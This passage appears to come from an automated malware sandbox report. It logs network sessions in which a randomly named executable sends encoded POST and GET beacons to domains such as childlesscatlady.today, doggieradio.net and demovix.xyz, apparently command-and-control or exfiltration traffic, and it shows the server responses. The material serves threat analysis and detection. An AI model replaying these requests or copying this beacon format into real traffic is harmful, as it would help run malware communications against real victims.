                                                                      Data Ascii: F2=gu6he7xKy/oLfdr2RrYFlDPpNyMBerFqxJ7cMTsqXeza+lAAFohgKEYcXV/aP3KQP9hm3hk1addO0PhnR1YKWW9RW46F2HF18vSbdr7Vg+BCOlsitvLc+YHANKxA4t1HoVlxY652smSZLEQviSBngp6gBeNfnauKC7tagiz57EVKK0Yo9ioWwAsMMBYAocttIEccyh8=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      10192.168.2.8498223.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:21.994709969 CET791OUTPOST /itly/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.childlesscatlady.today
                                                                      Origin: http://www.childlesscatlady.today
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.childlesscatlady.today/itly/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 38 62 32 51 4d 6b 46 6e 6a 50 75 44 53 4d 42 58 4c 46 75 78 4a 48 63 4d 52 41 36 58 73 6e 61 77 67 38 41 45 72 35 67 4c 45 59 63 59 31 2f 62 46 58 4c 53 50 39 64 55 33 6a 77 31 61 64 5a 4f 30 4c 6c 6e 52 47 77 4a 45 57 39 54 44 49 36 48 79 48 46 31 38 76 53 62 64 6f 47 36 67 2b 70 43 4f 56 38 69 69 75 4c 66 68 6f 48 50 46 71 78 41 75 74 31 44 6f 56 6c 66 59 2b 35 49 73 6a 57 5a 4c 46 41 76 69 44 42 67 72 70 36 6d 63 75 4d 52 68 37 66 61 4b 35 78 66 69 53 6e 61 7a 58 52 38 43 69 31 43 6e 41 67 51 7a 41 45 6e 4d 43 77 32 74 72 77 46 53 6e 4d 73 73 32 71 4c 74 41 34 4f 37 34 45 6a 65 4d 69 56 63 6a 62 5a 70 43 69 51
                                                                      Data Ascii: F2=gu6he7xKy/oLf8b2QMkFnjPuDSMBXLFuxJHcMRA6Xsnawg8AEr5gLEYcY1/bFXLSP9dU3jw1adZO0LlnRGwJEW9TDI6HyHF18vSbdoG6g+pCOV8iiuLfhoHPFqxAut1DoVlfY+5IsjWZLFAviDBgrp6mcuMRh7faK5xfiSnazXR8Ci1CnAgQzAEnMCw2trwFSnMss2qLtA4O74EjeMiVcjbZpCiQ


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      11192.168.2.8498383.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:24.540694952 CET1808OUTPOST /itly/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.childlesscatlady.today
                                                                      Origin: http://www.childlesscatlady.today
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.childlesscatlady.today/itly/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 67 75 36 68 65 37 78 4b 79 2f 6f 4c 66 38 62 32 51 4d 6b 46 6e 6a 50 75 44 53 4d 42 58 4c 46 75 78 4a 48 63 4d 52 41 36 58 73 2f 61 77 53 6b 41 46 4b 35 67 49 45 59 63 56 56 2f 65 46 58 4c 54 50 35 4a 51 33 6a 74 43 61 66 52 4f 32 75 78 6e 58 33 77 4a 65 47 39 54 63 59 36 61 32 48 46 67 38 76 69 68 64 6f 57 36 67 2b 70 43 4f 54 34 69 72 66 4c 66 79 34 48 41 4e 4b 78 32 34 74 31 6e 6f 56 74 70 59 2b 74 59 74 58 69 5a 4c 6b 77 76 6b 31 31 67 30 5a 36 6b 64 75 4e 4d 68 37 53 41 4b 35 74 35 69 53 54 67 7a 58 70 38 53 31 46 66 6a 79 78 47 69 77 51 41 49 31 6b 63 6f 62 49 38 51 58 59 38 76 6c 79 62 74 77 78 68 35 4b 45 30 65 62 2b 5a 41 43 62 72 67 53 62 38 2f 78 69 35 70 5a 33 72 44 58 48 56 6e 37 6f 4a 58 73 36 54 59 70 48 71 52 61 50 65 44 56 37 31 58 68 55 35 4f 66 2f 42 42 4d 35 73 30 61 65 72 31 47 5a 70 79 5a 53 46 69 76 61 43 6e 4d 64 6e 2f 37 74 42 33 53 78 65 77 46 75 51 4e 61 62 41 38 59 78 41 38 75 48 6a 77 66 35 4f 66 66 56 36 4d 57 4f 34 48 59 4c 65 44 34 31 43 79 73 44 43 64 38 50 [TRUNCATED]
                                                                      Data Ascii: F2=gu6he7xKy/oLf8b2QMkFnjPuDSMBXLFuxJHcMRA6Xs/awSkAFK5gIEYcVV/eFXLTP5JQ3jtCafRO2uxnX3wJeG9TcY6a2HFg8vihdoW6g+pCOT4irfLfy4HANKx24t1noVtpY+tYtXiZLkwvk11g0Z6kduNMh7SAK5t5iSTgzXp8S1FfjyxGiwQAI1kcobI8QXY8vlybtwxh5KE0eb+ZACbrgSb8/xi5pZ3rDXHVn7oJXs6TYpHqRaPeDV71XhU5Of/BBM5s0aer1GZpyZSFivaCnMdn/7tB3SxewFuQNabA8YxA8uHjwf5OffV6MWO4HYLeD41CysDCd8PybYr5vjKac2COWL1e9Mey4op2QXkxSOgHBjGV0dxDOunrOUZhy14ccn2s2f6+dbMpsKMvbFVPmSH8kJu31YBWZ4Yk6UwSuP+YVjb9FGDHdBkK40YMD0DqGwTpih+mp4O+905ciB7+pCAnifmjihLJoW81uAgO1rcindtd9+kuPIdOc9piU+dfJr8MY5LQsD8Rg7yw1s3aTecy50Y2iPWEi+EiuA2kIJEGHq7IFJH7rtb6cIzVtkXpCIUUdla0yCCG6LtEXgx+luRaakgl3w/Ph7RlszlophawLmy2v/XTGTfD7+IMdsjY8c7C3oFbwey1gr/5CLx1qZ/apn+T27RqRy+4PvHglwZVSgkde/htWJi5cGyTeslfZYTmMvfWngfrw2IxSAl1+1Psb3HImw4doCvvGAnHo8oSv/AFHgPxGBOOCEsL8NoRL8w1c9eD1sjBs3Wk/W1hOzWNmIoYy3hofLqztlQLqprN+k1JJ4G8WmjGbfOl+uITMETYPLgGwtdFXS0LABkgbrsgN4etyzU/w/QAlLNnWJrySVSY4dALlnd0bIi+PEt1NFMzAE4nJA4JlF/cqBX4H94ftm7q0ZY9cl9uzdawF09CYg93H6vtTxfyWeNoNZY+B/ox2+6SqnFNhuIDCmBBLBuNBsk9sjFrnQVpB0RjK9gh1 [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.8498513.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:27.083715916 CET492OUTGET /itly/?F2=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouFUFoXNGv3nAP+8PLYYLXnvdwJlki1+XL6LziD5lvjPEK7Q==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.childlesscatlady.today
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:28:27.743560076 CET404INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 07 Nov 2024 14:28:27 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 264
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 32 3d 74 73 53 42 64 4c 41 36 67 76 38 34 59 38 47 63 59 75 67 2f 6a 44 43 79 43 77 38 59 4c 59 78 43 6c 5a 53 69 4f 41 30 47 58 4b 6e 57 38 43 73 75 45 62 51 39 59 46 77 66 61 47 50 53 4a 6c 57 63 50 5a 6c 56 32 54 64 70 4f 50 51 77 77 38 74 64 53 54 6f 75 46 55 46 6f 58 4e 47 76 33 6e 41 50 2b 38 50 4c 59 59 4c 58 6e 76 64 77 4a 6c 6b 69 31 2b 58 4c 36 4c 7a 69 44 35 6c 76 6a 50 45 4b 37 51 3d 3d 26 73 48 53 3d 35 34 33 68 41 70 77 48 44 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?F2=tsSBdLA6gv84Y8GcYug/jDCyCw8YLYxClZSiOA0GXKnW8CsuEbQ9YFwfaGPSJlWcPZlV2TdpOPQww8tdSTouFUFoXNGv3nAP+8PLYYLXnvdwJlki1+XL6LziD5lvjPEK7Q==&sHS=543hApwHD"}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.8499553.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:47.170686007 CET750OUTPOST /szy7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.doggieradio.net
                                                                      Origin: http://www.doggieradio.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.doggieradio.net/szy7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 48 2b 35 62 52 53 71 30 4e 72 68 68 70 7a 4f 79 55 78 2f 6f 45 67 75 76 79 30 75 41 38 46 42 63 6f 2b 77 6d 4a 53 41 74 4f 47 5a 71 6e 64 64 79 67 6d 38 41 54 4c 6a 6e 2b 39 4c 46 56 62 76 64 47 39 7a 76 70 32 46 62 5a 6e 57 59 39 76 4c 44 4a 67 77 73 6e 42 4c 75 31 4f 62 47 32 5a 74 35 6f 75 2f 65 55 76 4b 64 49 6a 67 74 36 5a 44 49 66 38 68 6d 6d 2f 6a 55 33 34 49 75 4c 65 77 6a 44 34 44 62 38 6d 76 72 76 4c 76 5a 72 49 58 4a 6e 43 62 70 73 55 31 6f 6b 79 57 4c 58 36 61 4e 78 6a 71 6c 63 4d 38 53 51 6d 48 4e 35 6a 72 68 4f 54 57 74 37 4d 2f 37 6b 59 4b 63 43 57 44 30 32 2f 53 39 39 2b 49 3d
                                                                      Data Ascii: F2=H+5bRSq0NrhhpzOyUx/oEguvy0uA8FBco+wmJSAtOGZqnddygm8ATLjn+9LFVbvdG9zvp2FbZnWY9vLDJgwsnBLu1ObG2Zt5ou/eUvKdIjgt6ZDIf8hmm/jU34IuLewjD4Db8mvrvLvZrIXJnCbpsU1okyWLX6aNxjqlcM8SQmHN5jrhOTWt7M/7kYKcCWD02/S99+I=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.8499693.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:49.732711077 CET770OUTPOST /szy7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.doggieradio.net
                                                                      Origin: http://www.doggieradio.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 223
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.doggieradio.net/szy7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 48 2b 35 62 52 53 71 30 4e 72 68 68 6f 54 65 79 58 51 2f 6f 55 77 75 73 72 30 75 41 32 6c 42 51 6f 2b 38 6d 4a 54 30 39 4f 7a 4a 71 6e 38 74 79 68 69 67 41 61 62 6a 6e 31 64 4c 63 49 72 75 54 47 39 2f 52 70 7a 39 62 5a 6e 43 59 39 75 58 44 4f 58 4d 72 6f 78 4c 73 34 75 62 45 79 5a 74 35 6f 75 2f 65 55 73 32 33 49 6c 49 74 6d 35 54 49 5a 64 68 6c 6c 2f 6a 62 79 34 49 75 61 4f 77 76 44 34 44 31 38 69 75 38 76 49 58 5a 72 4d 54 4a 67 58 6e 75 6c 55 31 75 71 53 58 31 59 2f 6e 68 76 52 6d 43 53 66 51 77 59 47 44 47 38 56 47 4c 55 78 65 72 34 4d 58 51 6b 62 69 71 48 68 65 63 73 63 43 4e 6a 70 64 5a 46 53 63 64 49 6a 43 4d 4f 31 57 7a 32 61 45 45 33 43 51 61
                                                                      Data Ascii: F2=H+5bRSq0NrhhoTeyXQ/oUwusr0uA2lBQo+8mJT09OzJqn8tyhigAabjn1dLcIruTG9/Rpz9bZnCY9uXDOXMroxLs4ubEyZt5ou/eUs23IlItm5TIZdhll/jby4IuaOwvD4D18iu8vIXZrMTJgXnulU1uqSX1Y/nhvRmCSfQwYGDG8VGLUxer4MXQkbiqHhecscCNjpdZFScdIjCMO1Wz2aEE3CQa


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.8499813.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:52.278417110 CET1787OUTPOST /szy7/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.doggieradio.net
                                                                      Origin: http://www.doggieradio.net
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 1239
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.doggieradio.net/szy7/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 48 2b 35 62 52 53 71 30 4e 72 68 68 6f 54 65 79 58 51 2f 6f 55 77 75 73 72 30 75 41 32 6c 42 51 6f 2b 38 6d 4a 54 30 39 4f 77 70 71 6e 75 31 79 67 44 67 41 41 62 6a 6e 34 39 4c 5a 49 72 75 65 47 38 58 4e 70 7a 35 68 5a 6c 36 59 37 4d 7a 44 50 6a 59 72 7a 42 4c 73 6b 65 62 46 32 5a 74 57 6f 75 76 61 55 73 6d 33 49 6c 49 74 6d 38 66 49 5a 4d 68 6c 6a 2f 6a 55 33 34 4a 68 4c 65 77 4c 44 34 62 44 38 69 69 73 76 34 33 5a 73 6f 33 4a 6c 68 7a 75 6e 30 31 73 70 53 58 39 59 2f 6a 2b 76 52 36 6b 53 65 6b 4b 59 45 44 47 2f 42 54 73 49 56 71 6f 37 75 48 2f 6b 35 2f 4d 63 47 75 67 79 65 57 78 70 75 39 4c 43 44 73 36 48 6a 65 66 62 33 6e 42 68 63 77 51 78 32 35 4e 58 74 72 6c 78 71 79 4f 51 2f 62 46 56 6b 77 38 6f 6d 61 52 62 79 71 47 61 7a 78 49 62 49 51 6a 54 68 31 4f 39 69 32 39 35 59 4d 4d 6a 56 61 51 32 34 6e 54 54 31 67 77 32 63 59 34 38 76 5a 68 31 49 59 64 51 63 74 41 7a 51 48 42 36 42 73 4b 6f 7a 4d 38 75 41 7a 67 2b 7a 70 42 44 53 43 79 72 4e 77 2b 70 51 69 50 70 50 78 68 66 36 32 44 64 54 41 [TRUNCATED]
                                                                      Data Ascii: F2=H+5bRSq0NrhhoTeyXQ/oUwusr0uA2lBQo+8mJT09Owpqnu1ygDgAAbjn49LZIrueG8XNpz5hZl6Y7MzDPjYrzBLskebF2ZtWouvaUsm3IlItm8fIZMhlj/jU34JhLewLD4bD8iisv43Zso3Jlhzun01spSX9Y/j+vR6kSekKYEDG/BTsIVqo7uH/k5/McGugyeWxpu9LCDs6Hjefb3nBhcwQx25NXtrlxqyOQ/bFVkw8omaRbyqGazxIbIQjTh1O9i295YMMjVaQ24nTT1gw2cY48vZh1IYdQctAzQHB6BsKozM8uAzg+zpBDSCyrNw+pQiPpPxhf62DdTAsHqY6kdxYHnj88j3Lfpa1qb6rGXC+ehwxDY1WMB8gisqO9pldoBrhxK3wL2S/M5KwnvgRgYGjmAuWPDexErOuXbqGhoSw8FpYC3NTCymOWo8akkb6+bjcriiA3N4PRpiYBx+d5SjWmZXg9MvmNwn0mS342Dd8YwaI8h0sJzOC1xVpe1Jdgtvjybc4XYLM5+G32vYkhgEoMQc18nmQE0sN9nmjJxSUraLytuQTp2yGdUHZTaAyeWnN8X8zNgB2N4kQSwa4DlptbRpUzFIrym5C4sa9KnYXnA5VDsAy3Cl4GHK+A29oNlfEa5/FUr2bxNZzxhORbfh6ooVZlg2Vv1ZKmGoOKLJVkVvfNp0ykCeMUJ7BK4PYZt8vRpMsMzfOO29Bp6Yk24KOQ20QmWMmrDj9FJwO41t0+XBJ6dwgeKdknGDsb7RPxlF9p3RLdw0fNhy3nt3Qe6bdWhpQV32UTgtwSeNklk1nNztzYVGxNBwNM1HDOLxIuAHH+c0QudfoVJkzqJUFLLjjq/pvii2/Bowe96tGdFh3HRwyTDx6XJT3lVRz+bs6kHFKymbPAnRZbkcHQVWOl7h7xdo/9XGen31v7JFnHWRTXTXD7ghXvxRwp8mVUrGWpEgI567m7cb92yTEWLtaaaYFk4BqsMeKA/JROOcJEGiG1cdUe [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.8499933.33.130.190805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:28:54.822185993 CET485OUTGET /szy7/?F2=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2zyO1xKTiz6oBrNu4Rs3SGBcTrpTqDeJ9pPLW36ghW+11Rw==&sHS=543hApwHD HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.doggieradio.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Nov 7, 2024 15:28:55.476773977 CET404INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Thu, 07 Nov 2024 14:28:55 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 264
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 46 32 3d 4b 38 52 37 53 6e 53 66 62 37 64 6c 69 33 65 58 52 41 44 33 53 6e 6e 74 73 56 53 53 6a 31 5a 43 6a 73 52 6c 43 7a 49 73 44 57 4a 55 78 63 6c 63 67 7a 56 59 54 71 37 66 36 4e 37 2f 55 4b 6a 54 42 70 50 58 33 57 56 6f 50 48 2f 76 30 74 6a 35 44 6d 6b 32 7a 79 4f 31 78 4b 54 69 7a 36 6f 42 72 4e 75 34 52 73 33 53 47 42 63 54 72 70 54 71 44 65 4a 39 70 50 4c 57 33 36 67 68 57 2b 31 31 52 77 3d 3d 26 73 48 53 3d 35 34 33 68 41 70 77 48 44 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?F2=K8R7SnSfb7dli3eXRAD3SnntsVSSj1ZCjsRlCzIsDWJUxclcgzVYTq7f6N7/UKjTBpPX3WVoPH/v0tj5Dmk2zyO1xKTiz6oBrNu4Rs3SGBcTrpTqDeJ9pPLW36ghW+11Rw==&sHS=543hApwHD"}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.849994199.192.19.19805284C:\Program Files (x86)\TIIMtmWBDOgKJqLyRAIwubPfyjAFihHzfKEdkzRHHZAfdvaWRkCDDxBDzJHtjEEfnvlrxdT\IpIaYUETnYWFH.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 7, 2024 15:29:00.684931040 CET738OUTPOST /azuc/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.demovix.xyz
                                                                      Origin: http://www.demovix.xyz
                                                                      Cache-Control: max-age=0
                                                                      Content-Length: 203
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.demovix.xyz/azuc/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                      Data Raw: 46 32 3d 46 47 75 55 66 75 67 39 59 79 56 51 35 4c 73 56 64 5a 4b 78 45 4c 49 45 4e 4b 5a 51 64 50 52 6e 43 48 4c 49 66 53 53 46 78 56 58 4f 4d 30 2b 32 52 34 57 35 43 41 6e 4d 45 4d 56 63 47 65 4f 37 51 79 4b 57 31 61 70 71 63 6e 52 4b 31 67 47 49 65 34 4d 76 30 41 78 38 79 67 70 41 47 47 30 41 35 65 56 54 48 43 76 61 6d 34 45 36 77 79 4a 35 70 47 6b 72 45 37 7a 61 73 66 45 41 38 74 52 35 57 6b 78 72 4e 34 49 57 47 62 78 47 36 65 4c 74 4d 46 4e 69 36 70 31 52 4f 45 72 48 71 50 59 72 75 72 46 31 4c 75 53 68 4e 71 72 78 6b 67 76 7a 31 56 2f 44 34 58 69 6d 65 6a 63 43 77 54 71 63 67 50 31 6c 50 63 6f 3d
                                                                      Data Ascii: F2=FGuUfug9YyVQ5LsVdZKxELIENKZQdPRnCHLIfSSFxVXOM0+2R4W5CAnMEMVcGeO7QyKW1apqcnRK1gGIe4Mv0Ax8ygpAGG0A5eVTHCvam4E6wyJ5pGkrE7zasfEA8tR5WkxrN4IWGbxG6eLtMFNi6p1ROErHqPYrurF1LuShNqrxkgvz1V/D4XimejcCwTqcgP1lPco=
                                                                      Nov 7, 2024 15:29:01.378232002 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Thu, 07 Nov 2024 14:29:01 GMT
                                                                      Server: Apache
                                                                      X-Frame-Options: SAMEORIGIN
                                                                      Content-Length: 16026
                                                                      X-XSS-Protection: 1; mode=block
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                      Nov 7, 2024 15:29:01.378258944 CET1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                      Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                      Nov 7, 2024 15:29:01.378271103 CET1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
